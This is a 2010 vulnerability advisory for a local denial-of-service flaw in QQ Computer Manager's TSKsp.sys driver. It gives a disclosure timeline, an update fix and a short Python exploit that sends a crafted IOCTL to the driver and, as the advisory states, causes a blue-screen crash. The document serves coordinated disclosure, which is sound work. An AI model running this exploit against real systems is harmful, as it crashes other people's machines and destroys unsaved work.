QQ Computer Manager TSKsp.sys Driver Denial Of Service

`QQ Computer Manager TSKsp.sys Driver Local Denial of Service Vulnerability  
  
By Lufeng Li of Neusoft Corporation  
  
Vulnerable: QQpcmgr<=v4.0Beta1  
  
Vendor: Tencent Inc  
  
1) Software Description:  
QQ doctors more than three years after the development and operation, and finally ushered in the fourth generation - QQ Computer Manager 4.0 . QQ butler 4.0 version of   
  
the computer not only doctors and QQ QQ integrated software management, and increased cloud killing horses, clean up the core function of plug-ins; addition,QQ computer   
  
butler innovative features introduced software to move, you can easily solve the insufficient disk space C problem.  
  
2) Details:  
A local denial of service vulnerability in QQ Computer Manager that handling ioctl request. A successful attack can lead to BSoD.   
  
3) Timeline:  
2010.07.01 Vendor notified   
2010.07.22 Vendor released new fixed versions  
2010.08.09 Advisory released  
  
4) Solution:  
Update to version QQPCMgr_40_278.  
  
5) Exploit:  
#!/usr/bin/python  
  
#################################################################  
#  
# Title: QQ Computer Manager TSKsp.sys Local Denial of Service Exploit  
# Author: Lufeng Li of Neusoft Corporation  
# Vendor: http://pcmgr.qq.com  
# Platform: Windows XPSP3 Chinese Simplified  
# Tested: QQpcmgr v4.0Beta1  
# Vulnerable: QQpcmgr<=v4.0Beta1  
#   
#################################################################  
from ctypes import *  
  
kernel32 = windll.kernel32  
Psapi = windll.Psapi  
  
if __name__ == '__main__':  
GENERIC_READ = 0x80000000  
GENERIC_WRITE = 0x40000000  
OPEN_EXISTING = 0x3  
CREATE_ALWAYS = 0x2  
  
DEVICE_NAME = "\\\\.\\tsksp"  
dwReturn = c_ulong()  
out_data = ''  
in_data = ''  
driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,  
0, None, CREATE_ALWAYS, 0, None)  
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data,0, out_data, 0,byref(dwReturn), None)  
  
---------------------------------------------------------------------------------------------------  
Confidentiality Notice: The information contained in this e-mail and any accompanying attachment(s)   
is intended only for the use of the intended recipient and may be confidential and/or privileged of   
Neusoft Corporation, its subsidiaries and/or its affiliates. If any reader of this communication is   
not the intended recipient, unauthorized use, forwarding, printing, storing, disclosure or copying   
is strictly prohibited, and may be unlawful.If you have received this communication in error,please   
immediately notify the sender by return e-mail, and delete the original message and all copies from   
your system. Thank you.   
---------------------------------------------------------------------------------------------------  
`